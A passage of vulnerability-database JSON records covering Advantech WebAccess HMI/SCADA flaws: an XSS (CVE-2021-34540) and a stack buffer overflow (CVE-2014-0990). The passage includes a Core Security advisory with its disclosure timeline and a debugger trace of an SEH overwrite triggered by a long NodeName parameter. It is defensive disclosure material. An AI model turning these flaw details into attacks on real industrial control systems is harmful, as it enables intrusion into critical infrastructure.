"AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "VHN-394726", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitabilityScore": 2.8, "id": "CVE-2021-34540", "impactScore": 2.7, "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "trust": 1.0, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "None", "baseScore": 6.1, "baseSeverity": "Medium", "confidentialityImpact": "Low", "exploitabilityScore": null, "id": "CVE-2021-34540", "impactScore": null, "integrityImpact": "Low", "privilegesRequired": "None", "scope": "Changed", "trust": 0.8, "userInteraction": "Required", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2021-34540", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2021-34540", "trust": 0.8, "value": "Medium" }, { "author": "CNNVD", "id": "CNNVD-202106-1189", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-394726", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-394726" }, { "db": "JVNDB", "id": "JVNDB-2021-008065" }, { "db": "CNNVD", "id": "CNNVD-202106-1189" }, { "db": "NVD", "id": "CVE-2021-34540" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess 8.4.2 and 8.4.4 allows XSS via the username column of the bwRoot.asp page of WADashboard. Advantech WebAccess Contains a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. Advantech WebAccess is a set of browser-based HMI/SCADA software developed by China Taiwan Advantech Company. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment", "sources": [ { "db": "NVD", "id": "CVE-2021-34540" }, { "db": "JVNDB", "id": "JVNDB-2021-008065" }, { "db": "VULHUB", "id": "VHN-394726" } ], "trust": 1.71 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2021-34540", "trust": 3.3 }, { "db": "JVNDB", "id": "JVNDB-2021-008065", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-202106-1189", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-394726", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-394726" }, { "db": "JVNDB", "id": "JVNDB-2021-008065" }, { "db": "CNNVD", "id": "CNNVD-202106-1189" }, { "db": "NVD", "id": "CVE-2021-34540" } ] }, "id": "VAR-202106-1381", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-394726" } ], "trust": 0.53470696 }, "last_update_date": "2024-08-14T14:25:18.471000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Support\u00a0How\u00a0can\u00a0we\u00a0help\u00a0you?", "trust": 0.8, "url": "https://www.advantech.com/support" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2021-008065" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-79", "trust": 1.1 }, { "problemtype": "Cross-site scripting (CWE-79) [NVD Evaluation ]", "trust": 0.8 } ], "sources": [ { "db": "VULHUB", "id": "VHN-394726" }, { "db": "JVNDB", "id": "JVNDB-2021-008065" }, { "db": "NVD", "id": "CVE-2021-34540" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.5, "url": "https://github.com/ethancsyang/cveproject/tree/main/cve-2021-34540" }, { "trust": 1.7, "url": "https://www.advantech.com/support" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-34540" } ], "sources": [ { "db": "VULHUB", "id": "VHN-394726" }, { "db": "JVNDB", "id": "JVNDB-2021-008065" }, { "db": "CNNVD", "id": "CNNVD-202106-1189" }, { "db": "NVD", "id": "CVE-2021-34540" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-394726" }, { "db": "JVNDB", "id": "JVNDB-2021-008065" }, { "db": "CNNVD", "id": "CNNVD-202106-1189" }, { "db": "NVD", "id": "CVE-2021-34540" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-06-11T00:00:00", "db": "VULHUB", "id": "VHN-394726" }, { "date": "2022-03-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2021-008065" }, { "date": "2021-06-11T00:00:00", "db": "CNNVD", "id": "CNNVD-202106-1189" }, { "date": "2021-06-11T12:15:12.130000", "db": "NVD", "id": "CVE-2021-34540" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-06-21T00:00:00", "db": "VULHUB", "id": "VHN-394726" }, { "date": "2022-03-02T09:11:00", "db": "JVNDB", "id": "JVNDB-2021-008065" }, { "date": "2021-06-28T00:00:00", "db": "CNNVD", "id": "CNNVD-202106-1189" }, { "date": "2021-06-21T17:37:42.973000", "db": "NVD", "id": "CVE-2021-34540" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202106-1189" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech\u00a0WebAccess\u00a0 Cross-site Scripting Vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2021-008065" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "XSS", "sources": [ { "db": "CNNVD", "id": "CNNVD-202106-1189" } ], "trust": 0.6 } }
var-201409-0444
Vulnerability from variot
Stack-based buffer overflow in Advantech WebAccess (formerly BroadWin WebAccess) 7.2 allows remote attackers to execute arbitrary code via the UserName parameter. Advantech WebAccess is an IE-based HMI/SCADA monitoring software that features all engineering projects, database setup, drawing and software management using a standard browser over the internet or intranet. A buffer overflow vulnerability exists in Advantech WebAccess. An attacker exploits a vulnerability to execute arbitrary code in the context of an affected application or to crash the entire application. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed exploit attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.2 is vulnerable; other versions may also be affected. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Advantech WebAccess Vulnerabilities
-
Advisory Information
Title: Advantech WebAccess Vulnerabilities Advisory ID: CORE-2014-0005 Advisory URL: http://www.coresecurity.com/advisories/advantech-webaccess-vulnerabilities Date published: 2014-09-02 Date of last update: 2014-09-01 Vendors contacted: Advantech Release mode: User release
-
Vulnerability Description
Advantech WebAccess [1] is a browser-based software package for human-machine interfaces HMI, and supervisory control and data acquisition SCADA.
-
WebAccess 7.2 .
-
Non-vulnerable packages
. AdvantechWebAccessUSANode_20140730_3.4.3
-
Vendor Information, Solutions and Workarounds
Advantech has addressed the vulnerability in WebAccess by issuing an update located at http://webaccess.advantech.com/downloads_software.php
Given that this is a client-side vulnerability, affected users should avoid opening untrusted '.html' files. Core Security also recommends those affected use third party software such as Sentinel [4] or EMET [3] that could help to prevent the exploitation of affected systems to some extent.
-
Credits
This vulnerability was discovered and researched by Ricardo Narvaja from Core Security Exploit Writers Team.
Core Security Advisories Team would also like to thank ICS-CERT Coordination Center for their assistance during the vulnerability reporting process.
-
Below is shown the result of opening a malicious html file with a long NodeName parameter, an attacker can overflow the stack buffer mentioned above and overwrite the SEH (Structured Exception Handler), enabling arbitrary code execution on the machine.
/-----
EAX 03A39942 ASCII "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB..." ECX 0162B720 EDX 01630000 xpsp2res.01630000 EBX 0162B720 ESP 0162B454 EBP 0162B460 ESI 0162B4D8 EDI 03A31E98 EIP 064EA6D4 webvact.064EA6D4
-----/
/-----
SEH chain of thread 000016CC Address SE handler 0162DB40 42424242
-----/
-
Report Timeline . 2014-05-06: Core Security notifies Advantech of the vulnerability. Publication date is set for May 26th, 2014. 2014-05-09: CORE asks for a reply. 2014-05-26: First release date missed. 2014-05-26: Core Security notifies that the issues were reported 2 weeks ago and there was no reply since May 6th, 2014. 2014-05-29: Core Security contacts the ICS-CERT for assistance in order to coordinate the disclosure of the advisory. 2014-05-29: ICS-CERT acknowledges Core Security e-mail, and asks for a technical description of the vulnerability. 2014-05-29: Core Security sends technical details to the ICS-CERT. 2014-06-05: ICS-CERT team notifies that they have contacted the vendor and that they will notify us once the vendor has validated the vulnerabilities. 2014-06-18: ICS-CERT team notifies that the vendor is working in a new release, expected to be released in September, and ask if Core Security is interested in validating Advantech's vulnerability fix in their beta version. 2014-06-18: Core Security accepts the testing of the vendor beta version, but shares their concerns about waiting several months for fixes that are related to vulnerabilities already public. 2014-06-18: ICS-CERT notifies that they will let us know when they plan to make the beta version available for testing. 2014-07-03: ICS-CERT team notifies that the vendor is working to provide a download link for the beta version. 2014-07-08: ICS-CERT team sends download link provided by the vendor. 2014-07-10: Core Security confirms to ICS-CERT that the new version it's still vulnerable, and comments that after some analysis the vulnerable function doesn't has changes. 2014-07-10: ICS-CERT notifies that they will let the vendor know that that the vulnerabilities still exist. And asks to setup a teleconference between Core Security, the CERT and the vendor. 2014-07-10: Core Security notifies the ICS-CERT that all interactions are made via email only. 2014-07-10: ICS-CERT notifies they provided the information to the vendor. 2014-07-21: Core Security notifies the ICS-CERT that Tipping Point Zero Day Initiative has released several advisories[2] affecting the vendor including some that appears to be related to the one we are coordinating. 2014-07-21: ICS-CERT notifies that some of those advisories where in coordination with them, and that after a review of the link shared by Core Security are related to ICSA-14-198-02 and don't appear to be related to the reported vulnerability. 2014-07-21: Core Security notifies that ZDI-14-243 and ZDI-14-244 appears to be directly related. 2014-07-21: ICS-CERT is trying to contact Advantech to get a status update and their current plan for vulnerability remediation. 2014-08-07: ICS-CERT notifies that they contacted the vendor and they are waiting for an status update. 2014-08-21: Core Security contacts ICS-CERT since no reply was received in the past two weeks. 2014-08-21: ICS-CERT notifies that vendor representative stated that they are currently training a new product manager and they have not yet responded to the vulnerabilities we are discussing. 2014-08-28: Core Security notifies the ICS-CERT that the advisory publication is going to be scheduled for Monday 1st of September. 2014-08-28: ICS-CERT acknowledges Core Security e-mail. 2014-08-28: Core Security re-schedules the advisory publication for Sep 2nd, 2014. 2014-09-02: Core Security found out that the vendor released a silent fix on 30th of July. 2014-09-02: Core Security releases the advisory CORE-2014-0005 tagged as user-release.
-
References
[1] http://webaccess.advantech.com/. [2] http://www.zerodayinitiative.com/advisories/published/. [3] http://support.microsoft.com/kb/2458544. [4] https://github.com/CoreSecurity/sentinel.
-
About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
-
About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
-
Disclaimer
The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
-
PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201409-0444", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 3.0, "vendor": "advantech", "version": "7.2" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "7.2" } ], "sources": [ { "db": "IVD", "id": "d27b8b38-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05418" }, { "db": "JVNDB", "id": "JVNDB-2014-004357" }, { "db": "CNNVD", "id": "CNNVD-201409-737" }, { "db": "NVD", "id": "CVE-2014-0990" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-004357" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Ricardo Narvaja", "sources": [ { "db": "BID", "id": "69535" } ], "trust": 0.3 }, "cve": "CVE-2014-0990", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2014-0990", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-05418", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "d27b8b38-2351-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-68483", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-0990", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2014-0990", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2014-05418", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201409-737", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "d27b8b38-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-68483", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "d27b8b38-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05418" }, { "db": "VULHUB", "id": "VHN-68483" }, { "db": "JVNDB", "id": "JVNDB-2014-004357" }, { "db": "CNNVD", "id": "CNNVD-201409-737" }, { "db": "NVD", "id": "CVE-2014-0990" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stack-based buffer overflow in Advantech WebAccess (formerly BroadWin WebAccess) 7.2 allows remote attackers to execute arbitrary code via the UserName parameter. Advantech WebAccess is an IE-based HMI/SCADA monitoring software that features all engineering projects, database setup, drawing and software management using a standard browser over the internet or intranet. A buffer overflow vulnerability exists in Advantech WebAccess. An attacker exploits a vulnerability to execute arbitrary code in the context of an affected application or to crash the entire application. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed exploit attempts will likely cause a denial-of-service condition. \nAdvantech WebAccess 7.2 is vulnerable; other versions may also be affected. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nAdvantech WebAccess Vulnerabilities\n\n\n1. *Advisory Information*\n\n Title: Advantech WebAccess Vulnerabilities\n Advisory ID: CORE-2014-0005\n Advisory URL:\nhttp://www.coresecurity.com/advisories/advantech-webaccess-vulnerabilities\n Date published: 2014-09-02\n Date of last update: 2014-09-01\n Vendors contacted: Advantech\n Release mode: User release\n\n\n2. *Vulnerability Description*\n\n Advantech WebAccess [1] is a browser-based\n software package for human-machine interfaces HMI, and supervisory\n control and data acquisition SCADA. \n\n\n4. WebAccess 7.2\n . \n\n\n5. *Non-vulnerable packages*\n\n . AdvantechWebAccessUSANode_20140730_3.4.3\n\n\n6. *Vendor Information, Solutions and Workarounds*\n\n Advantech has addressed the vulnerability in WebAccess by issuing an\nupdate located at\n http://webaccess.advantech.com/downloads_software.php\n\n Given that this is a client-side vulnerability, affected users\nshould avoid\n opening untrusted \u0027.html\u0027 files. \n Core Security also recommends those affected use third party\nsoftware such as\n Sentinel [4] or EMET [3]\n that could help to prevent the exploitation of affected systems to\nsome extent. \n\n\n7. *Credits*\n\n This vulnerability was discovered and researched by Ricardo Narvaja\nfrom\n Core Security Exploit Writers Team. \n \n Core Security Advisories Team would also like to thank ICS-CERT\nCoordination Center\n for their assistance during the vulnerability reporting process. \n \n\n8. \n\n Below is shown the result of opening a malicious html file with a long\n NodeName parameter, an attacker can overflow the stack buffer mentioned\n above and overwrite the SEH (Structured Exception Handler), enabling\n arbitrary code execution on the machine. \n\n/-----\n \nEAX 03A39942 ASCII \"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB...\"\nECX 0162B720\nEDX 01630000 xpsp2res.01630000\nEBX 0162B720\nESP 0162B454\nEBP 0162B460\nESI 0162B4D8\nEDI 03A31E98\nEIP 064EA6D4 webvact.064EA6D4\n\n-----/\n\n\n/-----\n \nSEH chain of thread 000016CC\nAddress SE handler\n0162DB40 42424242\n\n-----/\n\n\n9. *Report Timeline*\n . 2014-05-06: Core Security notifies Advantech of the vulnerability. \nPublication date is set for May 26th, 2014. 2014-05-09: CORE asks for a reply. 2014-05-26: First release date missed. 2014-05-26: Core Security notifies that the issues were reported 2\nweeks ago and there was no reply since May 6th, 2014. 2014-05-29: Core Security contacts the ICS-CERT for assistance in\norder to coordinate the disclosure of the advisory. 2014-05-29: ICS-CERT acknowledges Core Security e-mail, and asks\nfor a technical description of the vulnerability. 2014-05-29: Core Security sends technical details to the ICS-CERT. 2014-06-05: ICS-CERT team notifies that they have contacted the\nvendor and that they will notify us once the vendor has validated the\nvulnerabilities. 2014-06-18: ICS-CERT team notifies that the vendor is working in a\nnew release, expected to be released in September, and ask if Core\nSecurity is interested in validating Advantech\u0027s vulnerability fix in\ntheir beta version. 2014-06-18: Core Security accepts the testing of the vendor beta\nversion, but shares their concerns about waiting several months for\nfixes that are related to vulnerabilities already public. 2014-06-18: ICS-CERT notifies that they will let us know when they\nplan to make the beta version available for testing. 2014-07-03: ICS-CERT team notifies that the vendor is working to\nprovide a download link for the beta version. 2014-07-08: ICS-CERT team sends download link provided by the vendor. 2014-07-10: Core Security confirms to ICS-CERT that the new\nversion it\u0027s still vulnerable, and comments that after some analysis the\nvulnerable function doesn\u0027t has changes. 2014-07-10: ICS-CERT notifies that they will let the vendor know\nthat that the vulnerabilities still exist. And asks to setup a\nteleconference between Core Security, the CERT and the vendor. 2014-07-10: Core Security notifies the ICS-CERT that all\ninteractions are made via email only. 2014-07-10: ICS-CERT notifies they provided the information to the\nvendor. 2014-07-21: Core Security notifies the ICS-CERT that Tipping Point\nZero Day Initiative has released several advisories[2] affecting the\nvendor including some that appears to be related to the one we are\ncoordinating. 2014-07-21: ICS-CERT notifies that some of those advisories where\nin coordination with them, and that after a review of the link shared by\nCore Security are related to ICSA-14-198-02 and don\u0027t appear to be\nrelated to the reported vulnerability. 2014-07-21: Core Security notifies that ZDI-14-243 and ZDI-14-244\nappears to be directly related. 2014-07-21: ICS-CERT is trying to contact Advantech to get a\nstatus update and their current plan for vulnerability remediation. 2014-08-07: ICS-CERT notifies that they contacted the vendor and\nthey are waiting for an status update. 2014-08-21: Core Security contacts ICS-CERT since no reply was\nreceived in the past two weeks. 2014-08-21: ICS-CERT notifies that vendor representative stated\nthat they are currently training a new product manager and they have not\nyet responded to the vulnerabilities we are discussing. 2014-08-28: Core Security notifies the ICS-CERT that the advisory\npublication is going to be scheduled for Monday 1st of September. 2014-08-28: ICS-CERT acknowledges Core Security e-mail. 2014-08-28: Core Security re-schedules the advisory publication\nfor Sep 2nd, 2014. 2014-09-02: Core Security found out that the vendor released a\nsilent fix on 30th of July. 2014-09-02: Core Security releases the advisory CORE-2014-0005\ntagged as user-release. \n\n\n10. *References*\n\n [1] http://webaccess.advantech.com/. \n [2] http://www.zerodayinitiative.com/advisories/published/. \n [3] http://support.microsoft.com/kb/2458544. \n [4] https://github.com/CoreSecurity/sentinel. \n\n\n11. *About CoreLabs*\n\n CoreLabs, the research center of Core Security, is charged with\nanticipating\n the future needs and requirements for information security\ntechnologies. \n We conduct our research in several important areas of computer security\n including system vulnerabilities, cyber attack planning and simulation,\n source code auditing, and cryptography. Our results include problem\n formalization, identification of vulnerabilities, novel solutions and\n prototypes for new technologies. CoreLabs regularly publishes security\n advisories, technical papers, project information and shared software\n tools for public use at:\n http://corelabs.coresecurity.com. \n\n\n12. *About Core Security Technologies*\n\n Core Security Technologies enables organizations to get ahead of threats\n with security test and measurement solutions that continuously identify\n and demonstrate real-world exposures to their most critical assets. Our\n customers can gain real visibility into their security standing, real\n validation of their security controls, and real metrics to more\n effectively secure their organizations. \n\n Core Security\u0027s software solutions build on over a decade of trusted\n research and leading-edge threat expertise from the company\u0027s Security\n Consulting Services, CoreLabs and Engineering groups. Core Security\n Technologies can be reached at +1 (617) 399-6980 or on the Web at:\n http://www.coresecurity.com. \n\n\n13. *Disclaimer*\n\n The contents of this advisory are copyright\n (c) 2014 Core Security and (c) 2014 CoreLabs,\n and are licensed under a Creative Commons\n Attribution Non-Commercial Share-Alike 3.0 (United States) License:\n http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\n This advisory has been signed with the GPG key of Core Security\nadvisories\n team, which is available for download at\n \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc", "sources": [ { "db": "NVD", "id": "CVE-2014-0990" }, { "db": "JVNDB", "id": "JVNDB-2014-004357" }, { "db": "CNVD", "id": "CNVD-2014-05418" }, { "db": "BID", "id": "69535" }, { "db": "IVD", "id": "d27b8b38-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-68483" }, { "db": "PACKETSTORM", "id": "128120" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-0990", "trust": 3.7 }, { "db": "ICS CERT", "id": "ICSA-14-261-01", "trust": 3.1 }, { "db": "BID", "id": "69535", "trust": 2.0 }, { "db": "CNNVD", "id": "CNNVD-201409-737", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2014-05418", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-004357", "trust": 0.8 }, { "db": "CXSECURITY", "id": "WLB-2014090006", "trust": 0.6 }, { "db": "IVD", "id": "D27B8B38-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-68483", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128120", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "d27b8b38-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05418" }, { "db": "VULHUB", "id": "VHN-68483" }, { "db": "BID", "id": "69535" }, { "db": "JVNDB", "id": "JVNDB-2014-004357" }, { "db": "PACKETSTORM", "id": "128120" }, { "db": "CNNVD", "id": "CNNVD-201409-737" }, { "db": "NVD", "id": "CVE-2014-0990" } ] }, "id": "VAR-201409-0444", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": 